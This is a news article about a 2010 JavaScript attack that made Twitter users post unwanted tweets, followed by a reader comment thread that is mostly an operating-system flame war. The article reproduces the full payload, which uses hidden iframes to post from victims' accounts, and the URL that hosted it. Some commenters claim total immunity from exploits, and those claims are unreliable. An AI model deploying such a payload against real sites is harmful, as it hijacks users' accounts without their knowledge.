Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

Summary: A JavaScript web compromise has apparently affected a large amount of Twitter users.

SHARE:

On Sunday afternoon, a large number of Twitter accounts were compromised by users who inadvertently were lured into viewing the following URL,

http://pastehtml.com/view/1b7xk3b.html

which contains the following Javascript code:

var el1 = document.createElement('iframe'); var el2 = document.createElement('iframe'); el1.style.visibility="hidden"; el2.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location; el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with%20goats"; document.getElementsByTagName("body")[0].appendChild(el1); document.getElementsByTagName("body")[0].appendChild(el2);

Some of the most prominent Twitter posters with very large follower lists, such as @zee, web cartoonist @oatmeal and Tech Blogger Robert Scoble, @scobleizer have been affected, along with hundreds of thousands of their followers which also clicked on the malicious links.

The script, which causes a Twitter post to appear that directs browsers to execute the Javascript source code, and then posts an embarrassingly obscene message about goats (you can see it in the code snippet above) appears to affect only certain Windows-based browsers, as I was able to view and execute the source of the page safely using Chrome on Linux and my own Twitter account was not compromised.

I haven't been able to determine if any Mac or iOS or Android users have been compromised by this exploit yet, so please provide me with an update if you use Safari or another Mac browser or alternative OS and you've been hit.

UPDATE: At 1:49PM, EDT on Sunday, Twitter, on its status blog has notified users that the compromise has been blocked on the new and old versions of the Twitter Web UI and they are removing all the Tweets which have been sent with the cross-site compromise link and the offensive message.

Topics: Security, Browser, Social Enterprise

About

Jason Perlow, Sr. Technology Editor at ZDNet, is a technologist with over two decades of experience integrating large heterogeneous multi-vendor computing environments in Fortune 500 companies. Jason is currently a Partner Technology Strategist with Microsoft Corp. His expressed views do not necessarily represent those of his employer.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

25 comments
Log in or register to join the discussion
  • Deja Vu all over again. XSS (forgery)

    Seriously,<br>How many of you are not running Firefox with Noscript?<br><br>Raise your hand in shame.<br>Besides, <br>If you are running Ubuntu Linux as I assume Jason runs on his base system, then presumably you are running AppArmor LSM with a profile for Firefox in addition to Noscript.<br><br>If you are just 'this close' to reaching your breaking point with Microsoft Windows and the continual litany of Zero-Day exploits, then, PLEASE, come on ova to my world.<br><br>Once you begin to realize the true 'serenity' of Linux and see that you don't even need an Anti-virus tool (provided you maintain good practices, e.g., stay within-in the repo system and check SHA-1 sums of programs you download), you can be relatively confident that NOTHING bad will happen as you surf the Internet.<br><br>There's no reason to fear going on the Internet, provided you use Ubuntu Linux, that is.<br><br>Ubuntu Linux: The safest operating system on the Internet.<br><br>I stake my reputation on it.<br><br>P.S. Some of you may not be aware, AppArmor Firefox profile in Ubuntu Lucid is not enabled by default OOTB.<br><br>You can (and should) enable it with the following command:<br><br><b><br>$sudo aa-enforce /etc/apparmor.d/usr.bin.firefox</b><br><br>Be safe.

    One more thing XSS is a 'server-side' (Twitter) exploit, not client side, but, still Noscript will keep the script from executing.

    Run your site (as I do) with Plone and you will experience 0 problems with XSS.
    Dietrich T. Schmitz, ~ Your Linux Advocate
    • I was surprised by your post!

      @Dietrich T. Schmitz, Your Linux Advocate
      While I knew that at some point, someone would turn this story into an anti-MS rant but I was honestly surprised that it was the very first post!

      [i]$sudo aa-enforce /etc/apparmor.d/usr.bin.firefox[/i]

      How do you enable IE Protected Mode in Windows? Oh. Right. It is on by default. No need for new users to look up the man page for aa-enforce.

      Thanks for your honesty though. You've just admitted that Windows is more secure than Linux out of the box. I always assumed since you made such a fuss about AppArmor that it was on by default. Sorry Dietrich but the rules [b]clearly[/b] state that if something isn't configured by default, it doesn't count. Therefore, AppArmor no longer counts. :(

      [i]How many of you are not running Firefox with Noscript?[/i]

      Not me and I wouldn't recommend it for a second to new users. When I was running Firefox (have since switched to Chrome since I prefer it) I used NoScript and I personally liked it. However, I was savvy enough to know that when a website didn't work properly to check to see if it was because of NoScript. And a [b]lot[/b] of sites didn't work properly. I wouldn't recommend NoScript to new users because it [b]will[/b] give them a poor Internet experience, something they might easily blame on Firefox. Then they might switch back to IE. You wouldn't want that, would you?
      NonZealot
      • Protected-Mode is a hard-coded IE-specific feature

        @NonZealot
        And quite frankly, protected-mode, is not a guarantee your Windows machine won't be compromised.
        It gets worse, because now x64 Windows 7 can be exploited by the TDL3 rootkit:
        http://www.prevx.com/blog/154/TDL-rootkit-x-goes-in-the-wild.html
        Now, that's nasty.

        I will tell you that Linux can get rooted but not if you download apps only from your repository and if you sandbox your App be it Evolution (email), Firefox (browser), Evince (PDF reader) with AA, you are 100% safe from any kind of exploit.

        That is my assurance--100% safe from exploit.

        Because Windows doesn't offer LSM sandboxing technology, it is a bucket with holes in the bottom.

        Now, NZ, did you think your argument would work?
        There is no arguing the point:

        Microsoft has not seen fit to provide an LSM mechanism to support any and all Apps in need of sandboxing.

        Yet, they continue to feather their own nest by offering sandboxing for Office 2010. That is more than a bit troubling.

        As for your beloved Chrome, their Google Engineers have come straight out and written their own 'caveats' regarding sandboxing:

        http://dev.chromium.org/developers/design-documents/sandbox#TOC-Other-caveats

        Other caveats

        "The operating system might have bugs. Of interest are bugs in the Windows API that allow the bypass of the regular security checks. If such a bug exists, malware will be able to bypass the sandbox restrictions and broker policy and possibly compromise the computer. Under Windows, there is no practical way to prevent code in the sandbox from calling a system service.

        In addition, third party software, particularly anti-malware solutions, can create new attack vectors. The most troublesome are applications that inject dlls in order to enable some (usually unwanted) capability. These dlls will also get injected in the sandbox process. In the best case they will malfunction, and in the worst case can create backdoors to other processes or to the file system itself, enabling specially crafted malware to escape the sandbox."

        Linux partitions the kernel functions from LSM MAC functions in AppArmor or SELinux.

        As such LSMs have an added security advantage in that they police both the 'App' (Internet-facing App) and the Kernel.

        Not so with Windows 7. Google above even offers a 'disclaimer' that their sandbox is only as good as the underlying kernel. Injected dlls was given as an example of how the sandbox might become compromised.

        So, good luck with your Windows bucket. It doesn't matter *what* you run on it. It has security holes--big ones.

        Ubuntu Linux: The safest operating system on the Planet.

        I stake my reputation on it.
        Dietrich T. Schmitz, ~ Your Linux Advocate
      • Sorry DTS but none of that counts

        If it isn't enabled by default, it doesn't count. AppArmor no longer counts. Have a nice day!
        NonZealot
        • Well, I can see where you might wish that were so

          @NonZealot
          since you really have no counter-argument--you are being arbitrary in discounting the importance of AA.

          Of course, the FF profile is present OOTB on every Ubuntu install but Canonical chose not to have it enabled by default as many folks would find that some of their plugins would simply not work. Now, as for myself, I can 'train' any plugin to work with AA in a few minutes, but that may be beyond the ability of your average user.

          I have found that the FF profile works OOTB for all of the plugins I use: Ubiquity, Sync, Noscript, Adblock, Nightly Tester Tools, Firebug.

          For example, AA stops clicking on links (like magnet) to spawn a child process (your favorite torrent tool, e.g., deluge). But putting the profile into 'complain' mode for just a few minutes to train AA takes care of that.

          And AA is running OOTB on Ubuntu on many processes--just not FF by default.

          So, you really have no arguments for the purpose of discussing why Microsoft doesn't have LSM which would be of tremendous benefit in stopping zero-day exploits.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • Like I said, AppArmor no longer counts

        Out of the box, Windows has better sandboxing than Linux does. Sure, you can [b]add[/b] sandboxing to Firefox should you just happen to know about the aa-enforce command and you know where Firefox's AppArmor configuration is but the average user won't know any of this and will simply use Firefox believing that they are protected. But they aren't.

        [i]Canonical chose not to have it enabled by default as many folks would find that some of their plugins would simply not work[/i]

        Wow, this is getting better and better!!! So even if you [b]do[/b] happen to know about aa-enforce, it will break your browser? Fantastic!!! Protected Mode doesn't break IE.

        I'm glad to hear that after running a command line executable and "training" it to recognize your plug-ins, you feel that you are safe. This is all fine and good but MS recognizes that 99.9% of users won't do this. MS's solution, since it is on by default, is therefore superior to Linux's solution, which requires command line executables, parameters, and training to use.
        NonZealot
        • So much for reading comprehension.

          @NonZealot
          Windows protected-mode is a 'one-app' security feature that has been proven to not work (root kit 64-bit).

          Users and sys admins alike have no recourse in sandboxing their third-party apps--they are left 'out in the cold' by Microsoft who have seen fit however to 'feather their own nest', namely Office 2010 *does* sandbox its apps.

          So, stop deluding yourself. Linux offers LSM and that's the key security differentiator that qualifies Ubuntu Linux as 'the safest operating system on the planet'.

          You have no argument for that.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • You are wrong

        [i]Linux offers LSM[/i]

        Nope, it doesn't count because it isn't on by default. And when you [b]do[/b] turn it on, it breaks your browser, causing the end user to turn it off again.

        Those are the rules. Sorry DTS, I didn't make them up, you ABMers did. Now you have to live with those rules.
        NonZealot
        • Doesn't break the browser

          @NonZealot
          Technically, if you open /var/log/messages, you'd see an auditd permission-denial, but from the user's perspective trying to spawn an app as a child process will be silently denied.

          And that's all. Firefox will function fine. But I wouldn't expect you to know that because you haven't even given AA a full evaluation.

          But that's alright NZ, be happy with mediocrity and an operating system that is defective because that is what the masses get with Microsoft Windows.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • Thanks! I AM happy! As are hundreds of millions of others

        [i]be happy with mediocrity and an operating system that is defective because that is what the masses get with Microsoft Windows[/i]

        There are more happy Windows users than there are desktop Linux users total!

        [i]but from the user's perspective[/i]

        From the user's perspective, they try to interact with their add-on and nothing happens. No error message. No clue as to why their request was denied by the OS. Nothing happens. And you say desktop Linux has less than 1% marketshare? I can't for the life of me figure that one out!!!
        NonZealot
        • And tomorrow you will have more zero-day exploits

          @NonZealot

          to face--none of which you will be able to do anything about.

          Have fun.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • I suppose it is possible

        <i>And tomorrow you will have more zero-day exploits</i><br><br>Possibly. Haven't been hit by any yet though so I'll panic when there is a need to panic. That need hasn't arisen yet but I'll let you know when it does!<br><br><i>none of which you will be able to do anything about</i><br><br>Oh, exactly like a desktop Linux user who didn't run your little aa-enforce program because running that breaks your browser! Hard to get hit by an exploit if the program used in the exploit is unusable! :)
        NonZealot
        • Firefox is not unusable

          @NonZealot
          It's just that what isn't *defined* in the AA profile will be denied by AA. That simple.

          It only takes a few minutes to update the profile and you are good to go (go into 'complain mode' and use FF for the task that is blocked, then set to enforced).

          But of course, you will continue to confuse the issue.
          That's ok.
          Dietrich T. Schmitz, ~ Your Linux Advocate
      • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

        @NonZealot

        This is a problem the security community, including the author of NoScript, has yet to seriously address.

        What is more, NoScript works by ripping out suspicious Javascript (and other scripts). but this results in a lot of Javasript error messages in the console, errors that do not occur when the same site is viewed w/o NoScript. So NoScript is breaking the Javascript itself.

        Of course that leads to a poor Internet experience. But no one else IS addressing the security need, so if you ever use that same computer for a sensitive task, such as home banking or connecting to your E*trade account online, then run it anyway.
        mejohnsn
        • It is a server side issue

          @mejohnsn
          You are correct in that Noscript attempts to excise the offending XSS code, but it is indeed the server that accepts (and does nothing to stop it) injected javascript and executes it as if it were its own code.

          That's why I personally switched to Plone for my site.
          There is zero possibility for XSS with Plone.
          Plone Security overview:
          http://plone.org/products/plone/security/overview

          If the CIA, FBI and Nasa use it, that's good enough for me.

          Plone runs rings around Microsoft Sharepoint.
          Plone: The best (and safest) CMS on the Planet.

          I stake my reputation on it.
          Dietrich T. Schmitz, ~ Your Linux Advocate
    • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

      @Dietrich T. Schmitz, Your Linux Advocate

      Yup, get out a clay tablet and stick (Linux) and you'll be safe forever (until it get pwned once again by a bored hacker). However, the rest of us actually use our computers.

      I know a safer way - don't use Twitter ;-)
      tonymcs1
      • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

        @tonymcs@...

        How long will the two of you fanboys keep taking past each other? DTS clearly doesn't get why AppArmor turned off by default is a non-starter, but you clearly don't get why having security on by default is worthless if that security is already broken.
        mejohnsn
        • AA is not turned off by default. The profile for FF is.

          @mejohnsn
          nt
          Dietrich T. Schmitz, ~ Your Linux Advocate
    • RE: Javascript Web Exploit Attacks Huge Numbers of High-Profile Twitter Users

      @Dietrich T. Schmitz, Your Linux Advocate
      Here are just a few of the out in the wild exploits for Linux
      http://insecure.org/sploits_linux.html
      rparker009
  • What's happening with Twitter?

    Twitter is being regularly pwned by amateurs. Amazing.<br><br>That's some real awful and inefficient JavaScript code you got there. Obviously written by an amateur.<br><br>All it takes to pwn twitter is an amateur, that speaks volumes about the quality of the code that runs twitter.
    OS Reload